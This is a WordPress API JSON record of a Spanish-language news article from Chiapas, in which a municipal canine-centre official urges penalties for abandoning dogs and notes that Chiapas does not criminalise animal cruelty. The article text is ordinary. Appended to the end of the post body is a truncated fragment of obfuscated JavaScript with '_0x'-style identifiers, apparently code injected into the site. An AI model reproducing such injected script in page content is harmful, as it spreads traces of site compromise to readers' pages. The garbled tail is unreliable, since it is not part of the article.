{"id":2263,"date":"2022-05-20T00:39:58","date_gmt":"2022-05-20T00:39:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2263"},"modified":"2022-05-20T00:39:59","modified_gmt":"2022-05-20T00:39:59","slug":"necesario-castigas-el-maltrato-animal-para-evitar-abandono","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2263","title":{"rendered":"Necesario castigas el maltrato animal para evitar abandono"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-19-at-2.38.52-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-2264\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-19-at-2.38.52-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-19-at-2.38.52-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-19-at-2.38.52-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-19-at-2.38.52-PM-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-19-at-2.38.52-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>19 de mayo del 2022. Tuxtla Guti\u00e9rrez.- San Crist\u00f3bal de Las Casas. &#8211; Miguel \u00c1ngel Aguirre Aguilar, responsable del Centro Canino Municipal (CECAM), confirm\u00f3 que, en algunas zonas de la ciudad, se ha dado un incremento en la presencia de perros callejeros, el cual se debe a la temporada de calor, que ocasiona la atracci\u00f3n de las hembras que est\u00e1n en celos, dem\u00e1s que a\u00fan persiste muchas personas que abandonan lo animales en la calle o los tienen en las calles.<\/p>\n\n\n\n<p>Dej\u00f3 en claro que mientras la poblaci\u00f3n no haga conciencia en el cuidado de los animalitos, de nada servir\u00e1 que organizaciones o grupos protectores de animales, apoyen en evitar la reproducci\u00f3n, como las campa\u00f1as de esterilizaci\u00f3n.<\/p>\n\n\n\n<p>\u201cEstas campa\u00f1as no son m\u00e1gicas, tenemos que atacar ahora el fen\u00f3meno del abandono, tenemos que pensar ya en sancionar a las personas que dejen sus perros en las calles, la gente debe entender que un perro es un compromiso de vida, de por lo menos 15 a\u00f1os de vida, que significa proveer alimentaci\u00f3n, un lugar seguro dentro de casa, que no est\u00e9 en el sol, que no est\u00e9 bajo la lluvia, sacarlo a caminar con su correa y collar, entre otros cuidados\u201d, dijo.<\/p>\n\n\n\n<p>Reconoci\u00f3 que existe un reglamento para la fauna de San Crist\u00f3bal, aprobado en el a\u00f1o 2018, pero que solamente es una herramienta administrativa que debe aplicarse, y hacer algunas modificaciones para que se sancione a quienes abandonen a los animalitos \u201cporque no se vale, y que con esto se pueda atacar el maltrato animal, el maltrato animal es un tema bastante amplio\u201d.<\/p>\n\n\n\n<p>Aclar\u00f3 que podr\u00eda incluso comenzar a hacer el registro de quienes tienen alg\u00fan animalito, y con esto poder saber si alguien los est\u00e1 abandonando, para saber quienes los dejan abandonados o los dejan en las calles, con la aclaraci\u00f3n de que si se les escapa una o dos veces es entendible.<\/p>\n\n\n\n<p>Aguirre Aguilar lament\u00f3 que entre los estados que en su c\u00f3digo penal no est\u00e9 tipificado como delito el maltrato animal est\u00e9 Chiapas, ya que la gran mayor\u00eda en la rep\u00fablica si lo tiene, \u201caunque no todos los estados lo apliquen\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 19 de mayo del 2022. Tuxtla Guti\u00e9rrez.- San Crist\u00f3bal de Las Casas. &#8211; Miguel \u00c1ngel Aguirre Aguilar, responsable del Centro Canino Municipal (CECAM), confirm\u00f3 que, en algunas zonas de la ciudad, se ha dado un incremento en la presencia de perros callejeros, el cual se debe a la temporada de calor, que ocasiona &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2264,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-2263","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2263"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2263\/revisions"}],"predecessor-version":[{"id":2265,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2263\/revisions\/2265"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2264"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}